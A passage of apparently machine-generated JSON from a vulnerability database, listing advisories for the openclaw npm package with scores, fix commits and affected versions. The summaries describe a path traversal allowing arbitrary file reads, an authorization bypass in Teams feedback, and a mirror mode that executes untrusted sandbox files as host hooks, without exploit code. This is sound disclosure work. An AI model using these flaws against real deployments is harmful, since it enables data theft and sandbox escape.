tp://public2.vulnerablecode.io/api/vulnerabilities/89738?format=json","vulnerability_id":"VCID-vktg-77tu-vycv","summary":"OpenClaw: Path traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n## Summary\nPath traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 ACP dispatch still reads attachment paths outside the guarded attachment-cache or root checks, and the root-enforcement fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d` — 2026-03-30T14:04:02+01:00\n\nOpenClaw thanks @north-echo for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI
:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62"},{"reference_url":"https://github.com/advisories/GHSA-58q2-7r52-jq62","reference_id":"GHSA-58q2-7r52-jq62","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-58q2-7r52-jq62"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z
2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2
yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-58q2-7r52-jq62"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vktg-77tu-vycv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91432?format=json","vulnerability_id":"VCID-vm8g-hrvu-quhm","summary":"OpenClaw: MS Teams Feedback Invocation Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n## Summary\n\nMS Teams Feedback Invoke Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMicrosoft Teams feedback invokes previously bypassed sender authorization and could record feedback or trigger reflection for unauthorized 
senders. Commit `c5415a474bb085404c20f8b312e436997977b1ea` applies the same DM and group authorization checks to feedback invokes.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c5415a474bb085404c20f8b312e436997977b1ea`.\n\n## Fix Commit(s)\n\n- `c5415a474bb085404c20f8b312e436997977b1ea`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35654","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12423","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12387","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12424","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35654"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N
/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35654","reference_id":"CVE-2026-35654","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35654"},{"reference_url":"https://github.com/advisories/GHSA-rf6h-5gpw-qrgq","reference_id":"GHSA-rf6h-5gpw-qrgq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rf6h-5gpw-qrgq"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke","reference_id":"openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"
vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"
vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"
vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35654","GHSA-rf6h-5gpw-qrgq"],"risk_score":3.1,"expl
oitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vm8g-hrvu-quhm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/88996?format=json","vulnerability_id":"VCID-vqrj-z6tx-rff2","summary":"OpenClaw: OpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n## Summary\nOpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped <=2026.3.22 OpenShell mirror sync, but exploit needs mirror mode plus hooks enabled plus explicit hook opt-in plus restart, so high is overstated even though the direct fix shipped in v2026.3.28.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41355","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02672","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02725","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0272","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41355"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","sco
ring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41355","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41355"},{"reference_url":"https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"}],"url":"https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion"},{"reference_url":"https://github.com/advisories/GHSA-42mx-vp8m-j7qh","reference_id":"GHSA-42mx-vp8m-j7qh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42mx-vp8m-j7qh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/10
9863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-